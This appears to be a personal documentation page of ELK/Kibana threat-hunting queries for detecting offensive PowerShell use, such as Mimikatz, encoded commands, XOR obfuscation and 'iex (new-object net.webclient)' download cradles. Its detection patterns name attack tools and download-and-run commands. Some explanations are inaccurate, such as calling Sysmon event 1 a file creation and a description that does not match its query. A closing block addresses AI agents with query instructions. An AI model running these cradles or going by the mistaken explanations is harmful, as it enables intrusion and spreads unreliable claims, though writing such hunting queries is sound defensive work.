# Use Case With elk

ELK is an open source stack that consists of three applications (Elasticsearch, Logstash and Kibana) working in synergy to provide users with end-to-end search and visualization capabilities to analyze and investigate log file sources in real time.

<figure><img src="/files/8nQxJK07rqpvnrqzShe3" alt=""><figcaption></figcaption></figure>

ندخل ف الموضوع ع طول <br>

#### 1- Perform a hunt for well-known PowerShell Offensive Frameworks and commands

<br>

```markdown
(event.code:4688 OR event.code:1) AND process.name:"powershell.exe" AND (process.command_line:(*Empire* OR *PowerSploit* OR *Mimikatz* OR *PowershellEmpire* OR *Inveigh* OR *BloodHound* OR *PowerUp* OR *nishang* OR *Seatbelt* OR *SharpHound*) OR process.command_line:(*Invoke-Mimikatz* OR *Invoke-SharpHound* OR *Invoke-Inveigh* OR *Invoke-BloodHound* OR *Invoke-Phant0m* OR *Invoke-StealthUser* OR *Invoke-PortScan* OR *Invoke-TokenManipulation* OR *PowerView.ps1* OR *PowerUp.ps1*))
```

This query searches for two types of events:

* Windows process creation events with event code 4688, indicating a new process was created.
* File creation events with event code 1, indicating a new file was created.

The query filters for events where the process name is "powershell.exe" and the process command line includes any of the well-known PowerShell offensive frameworks and commands, such as Empire, PowerSploit, Mimikatz, BloodHound, and others. The query uses the `OR` operator to match any of the keywords within the command line.

#### 2- Perform a hunt for suspicious parent process spawning PowerShell

```csharp
event.code:4688 AND event.action:created AND process.parent.name:"explorer.exe" AND process.name:"powershell.exe"
```

This query searches for Windows process creation events with event code 4688, indicating a new process was created. It further filters for events where the process action is "created" and the parent process name is "explorer.exe". Additionally, the query looks for events where the new process is named "powershell.exe", indicating a potential instance of PowerShell being spawned by a suspicious parent process.

We can also expand the query to include additional fields or filters, such as the user who executed the process or the path of the executable.

#### 3-  Perform a hunt for renamed PowerShell.exe

```csharp
(event.code:4688 OR event.code:1) AND process.name:"powershell.exe" AND process.executable:(*rename* OR *renamed*) AND NOT process.executable:"powershell.exe"
```

This query searches for two types of events:

* Windows process creation events with event code 4688, indicating a new process was created
* File creation events with event code 1, indicating a new file was created

The query filters for events where the process name is "powershell.exe", but the process executable includes the words "rename" or "renamed", indicating a potential instance of PowerShell being renamed by an attacker. The `NOT` operator is used to exclude events where the process executable is "powershell.exe" to avoid including legitimate instances of PowerShell.

#### &#x20;4- Perform a hunt for base64-encoded PowerShell commands

```csharp
(event.code:4688 OR event.code:1) AND process.name:"powershell.exe" AND (process.command_line:(*'-encodedcommand'* OR '*-encodedcommand'*) OR process.command_line:(*'-enc'* OR '*-enc'*) OR process.command_line:(*'-encoded'* OR '*-encoded'*)) AND process.command_line:(*base64*)
```

This query searches for two types of events:

* Windows process creation events with event code 4688, indicating a new process was created.
* File creation events with event code 1, indicating a new file was created.

The query filters for events where the process name is "powershell.exe" and the process command line includes any of the following parameters: "-encodedcommand", "-enc", or "-encoded". Additionally, the query looks for events where the process command line includes the word "base64", indicating a potential instance of base64-encoded PowerShell commands.

#### 5- Perform a hunt for PowerShell attacks utilizing GZIP compression

```csharp
event.code: 4103 and event.provider: "Microsoft-Windows-PowerShell" and event.opcode: 5 and "Content-Encoding: gzip" IN event.original
```

#### This query searches for events with the code 4103 from the Microsoft-Windows-PowerShell provider with opcode 5 (which indicates the use of a PowerShell script block). It then checks if the string "Content-Encoding: gzip" is present in the original field of the event, which includes the full raw message.

<br>

#### 6-  Perform a hunt for obfuscated PowerShell code using XOR

```csharp
event.code: 4104 and event.provider: "Microsoft-Windows-PowerShell" and event.opcode: 3 and "XOR" IN event.original
```

\
This query searches for events with the code 4104 from the Microsoft-Windows-PowerShell provider with opcode 3 (which indicates the use of the PowerShell XOR operator). It then checks if the string "XOR" is present in the original field of the event, which includes the full raw message.

#### &#x20;7- Perform a hunt for execution of an assembly from file by PowerShell

```csharp
event.code: 800 and event.provider: "Microsoft-Windows-PowerShell" and "Assembly" IN event.original and "LoadFrom" IN event.original
```

\
This query searches for events with the code 800 from the Microsoft-Windows-PowerShell provider. Code 800 indicates that an external module or assembly was loaded by PowerShell. The query checks if the strings "Assembly" and "LoadFrom" are present in the original field of the event, which includes the full raw message.

#### 8-  Perform a hunt for PowerShell commands downloading content

```csharp
(event.code: 4103 or event.code: 4104) and event.provider: "Microsoft-Windows-PowerShell" and ("Invoke-WebRequest" IN event.original or "Invoke-RestMethod" IN event.original or "Net.WebClient" IN event.original)
```

\
This query searches for events with the code 4103 or 4104 from the Microsoft-Windows-PowerShell provider, and checks if the string "Invoke-WebRequest", "Invoke-RestMethod", or "Net.WebClient" is present in the original field of the event. These are common PowerShell commands used for downloading content from the internet.

#### 9- Perform a hunt for obfuscated PowerShell commands

```csharp
(event.code: 4103 or event.code: 4104) and event.provider: "Microsoft-Windows-PowerShell" and "EncodedCommand" IN event.original
```

\
This query searches for events with the code 4103 or 4104 from the Microsoft-Windows-PowerShell provider. Code 4103 indicates that a PowerShell script block was executed, while code 4104 indicates that a PowerShell command was executed. The query checks if the string "EncodedCommand" is present in the original field of the event, which indicates that the PowerShell command was obfuscated.

\
or&#x20;

```csharp
(event.code: 4103 or event.code: 4104) and event.provider: "Microsoft-Windows-PowerShell" and ("Out-String -Stream | %{$_ -replace" IN event.original)
```

\
This query searches for events with the code 4103 or 4104 from the Microsoft-Windows-PowerShell provider, and checks if the original field of the event contains the string "Out-String -Stream | %{$\_ -replace". This string is commonly used to obfuscate PowerShell commands by converting them to a string, replacing certain characters, and then invoking them using the "&" operator.

\
or&#x20;

```csharp
(event.code: 4103 or event.code: 4104) and event.provider: "Microsoft-Windows-PowerShell" and ("--NoP -sta -NonI -Win" IN event.original)
```

This query searches for events with the code 4103 or 4104 from the Microsoft-Windows-PowerShell provider, and checks if the original field of the event contains the string "--NoP -sta -NonI -Win". This string is often used to obfuscate PowerShell commands by disabling PowerShell's default execution policy, running in a STA (Single-Threaded Apartment) mode, disabling interactive prompts, and running in a non-interactive session.

or&#x20;

<br>

```csharp
(event.code: 4103 or event.code: 4104) and event.provider: "Microsoft-Windows-PowerShell" and ("iex (new-object net.webclient)" IN event.original)
```

This query searches for events with the code 4103 or 4104 from the Microsoft-Windows-PowerShell provider, and checks if the original field of the event contains the string "$(\[Text.Encoding]::ASCII.GetString". This string is often used to obfuscate PowerShell commands by converting them to ASCII-encoded strings and then decoding them at runtime using the Text.Encoding class.

* okay okay PowerShell has a number of techniques that can be utilized to circumvent detection and analysts.
* If any query returns any events, they may indicate obfuscated PowerShell commands. You can then investigate these events further using other features of the ELK SIEM solution, such as visualization, timeline analysis, or threat intelligence lookups, to determine if they are indeed malicious.

\------------------------------------------------------

<br>

<br>

<br>

<br>

<br>

<br>

<br>

<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xmedhat.gitbook.io/whoami/use-case-with-elk.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.